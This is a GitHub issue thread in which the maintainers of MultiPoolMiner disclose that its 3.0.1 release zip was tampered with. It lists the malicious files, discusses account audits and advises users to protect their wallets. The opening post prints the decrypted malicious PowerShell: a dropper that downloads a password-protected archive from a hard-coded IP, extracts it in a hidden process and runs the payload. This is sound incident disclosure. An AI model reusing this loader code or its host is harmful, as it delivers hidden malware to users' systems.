Important: Delete Excawataor.ps1 and check your systems for viruses

[UselessGuru]

Important!!!

The 3.0.1 release zip file got tampered with on Oct. 18th. 2018.

I've created a cleaned release which can be downloaded here:

MultiPoolMiner_3.0.1a_Release.zip
SHA256 Hash 518C520A1B6F99306D58F2011DE96AE1BDC7CA87CEE9B0037480A8D9C0B4FE56

Actions required

Delete the following files immediately (if present):

• [MPM-Dir]\Miners_Legacy\Excawator.ps1
• [MPM-Dir]\Wrapper.ps1
• [MPM-Dir]\web\parts\5.jpg
• [MPM-Dir]\web\parts\7z.exe
• [MPM-Dir]\web\parts\9b9ullpe9

Reboot & Check your rig for viruses
Wrapper.ps1 needs to be replaced with a file from the cleaned release (see below).

To be save delete the whole MPM folder (just keep the config & stat files). Then download and install MPM again.

@aaronsace

Do you have any information (or have transfer logs) to find out who uploaded the manipulated file?

What happened???

On Oct. 26th an unknown source replaced the master release file with a tampered package that contains malicious code.
Two files were tampered with:

• [MPM-Dir]\Miners_Legacy\Excawator.ps1
• [MPM-Dir]\Wrapper.ps1

Wrapper.ps1 calls Excawator.ps1
Excawator.ps1 is a malicious script that contains encrypted code.
The decrypted code is shown below:

$Url = "http://188.120.239.9/images/bg/5.jpg"
$file7z = ".\web\parts\5.jpg"
$filest = ".\web\parts\7z.exe"
$Path = ".\web\parts"
$Flag = ".\web\parts\9b9ullpe9"
$Pass = "3humskvm"


$isfile = Test-Path $Flag
if($isfile -eq "True") {
}
else
{

$isfile = Test-Path $filest
if($isfile -eq "True") {
}
else
{
$HTTP_Request = [System.Net.WebRequest]::Create('http://google.com')
$HTTP_Response = $HTTP_Request.GetResponse()
$HTTP_Status = [int]$HTTP_Response.StatusCode
If ($HTTP_Status -eq 200) {
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($Url,$file7z)
Invoke-CreateProcess -Binary ([IO.Path]::GetFullPath("7z.exe")) -Args "/c x -p""$Pass"" ""$file7z"" -aoa -o$Path -r" -CreationFlags 0x08000000 -ShowWindow 0x0 -StartF 0x1
Remove-Item "$file7z"
Start-Process "$filest"
$file = New-Object -TypeName System.IO.FileStream -ArgumentList $Flag,Create
$file.Close()
}
$HTTP_Response.Close()
  }
}

As some users have reported the malicious code fails to execute and throws errors on some systems.
#2227 (comment)
#2215
We cannot say wether the exploit generally failed.

Edit: Github logs show the release was first tampered with on October 18th, up until November 4th. Changed this post to reflect that -grantemsley

[aaronsta1]

this new version doesnt have that fix we just did.

[UselessGuru]

this new version doesnt have that fix we just did.

Correct. This will be in 3.10 Beta 9

[aaronsace]

@UselessGuru I don't think releases are tracked: https://github.com/organizations/MultiPoolMiner/settings/audit-log

I've changed my password as a precaution.

[UselessGuru]

@aaronsace

I cannot access these logs. error 404

Did you change the permissions on the repo - all collaborateurs have at least admin rights. ???

BTW: Any input the changes/enhancements I made to 3.1.0 (beta)?

[grantemsley]

I've checked the security tab in my profile and don't see any suspicious logins or other activity. And my account uses 2FA. Doesn't appear to have come from my account.

[UselessGuru]

Nothing suspicious in my security profile. And I changed my GitHub password.

[grantemsley]

I was able to contact github support and get a record of the changes made to that release.

@aaronsace it shows you edited the release 21 times between 2019-10-18 and 2018-10-26 - was that actually you, changing some wording or something? If not I would strongly advise you to check the security page of your profile for any suspicious activity and anything else that they might have done through your account. If you can I'd also make sure you're using 2FA for github. Contact me on skype if you want me to forward you the logs github sent me.

For anyone that was affected: We don't know what they payload(s) were. The files the virus downloaded from a russian website are gone now, so I can't analyze them. If you downloaded 3.0.1 any time between October 18 to November 09, I'd strongly recommend you carefully check your systems for viruses, or better yet wipe them completely.

If you store your bitcoin wallet on the same computer you mine on, I'd also encourage you to create a new wallet from a computer you know isn't affected, and transfer any bitcoin you have to that new wallet. This is just a precaution - we don't know what the payload did, or what they were after. But since they specifically targeted mining software, there's a good chance they'd try to go after people's wallets.

Likewise, changing passwords to miningpoolhub, any exchanges you use, or just all websites in general would be a good precaution.

[carlo0000]

i ve downloaded 7a,8a,10 but did not see any of the files except Wrapper.ps1 but looks empty file

but there is a problem with my earning on Zpool
have 10x 1080ti on zpool doing mostly x16r the hole day i see on the graphics it s 99% x16r

0,00095 ±10 % x2 (2 computers)

but i earned on last 24h 0.000395 and the day before 0.000627 and the day before 0.000062
??? what the hell i only have 2 pool , and i checked multipool compters did not go there

i think removing the x16r algo

[UselessGuru]

@carlo0000

i ve downloaded 7a,8a,10 but did not see any of the files except Wrapper.ps1 but looks empty file

Wrapper.ps1 needs to be empty. That is OK.

have 10x 1080ti on zpool doing mostly x16r the hole day i see on the graphics it s 99% x1
Maybe your stat got corrupted. Try Reset-Stats.bat

[carlo0000]

i asked on zpool chat, they said x16r was not good to mine i should remove the algo
i was earning less than 25% what it should be best day was 50%
very bad, they doing eth now